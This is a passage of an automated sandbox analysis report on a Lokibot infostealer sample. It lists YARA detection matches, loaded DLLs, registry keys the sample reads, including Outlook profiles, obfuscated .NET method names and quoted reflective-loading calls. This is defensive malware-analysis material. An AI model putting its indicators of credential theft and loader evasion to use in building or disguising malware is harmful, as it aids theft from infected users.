                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: SCB#89940578.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Ik0ivW0xlAKcCUFkH9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Ik0ivW0xlAKcCUFkH9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SCB#89940578.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMutant created: NULL
                      Source: SCB#89940578.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SCB#89940578.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: SCB#89940578.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SCB#89940578.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: SCB#89940578.exe, Customer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                      Source: SCB#89940578.exeStatic PE information: section name: .text entropy: 7.959447927229037
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KK8HF5OV0PrvkrfPAW.csHigh entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, l5Me6QnMTckMyms01E.csHigh entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, juoagBsKAnhO29XXUYd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, HFCf2gSPskZCZYx2in.csHigh entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.csHigh entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, P6ZjqJ3swucoCPdYU1.csHigh entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, bomrjQeeRO7MjCq9JL.csHigh entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, WfRbqtROjKsisi9C2c.csHigh entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, QmlKtsm8sb4NYGqwub.csHigh entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, LTk0Go7k75hJh3fWMD.csHigh entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, EEsydkCYx57eeOBB6N.csHigh entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, OFNmdb1Z9H5cTqygQe.csHigh entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, wwHVEEjpM51biTRAEV.csHigh entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, dDd5a9goxCsUjXNo8Z.csHigh entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.csHigh entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KhgswbJRLEXpkhV9SF.csHigh entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, RRfmNsut01lROUp1Bc.csHigh entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, K0FH4RswvYbcRDHFRPs.csHigh entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
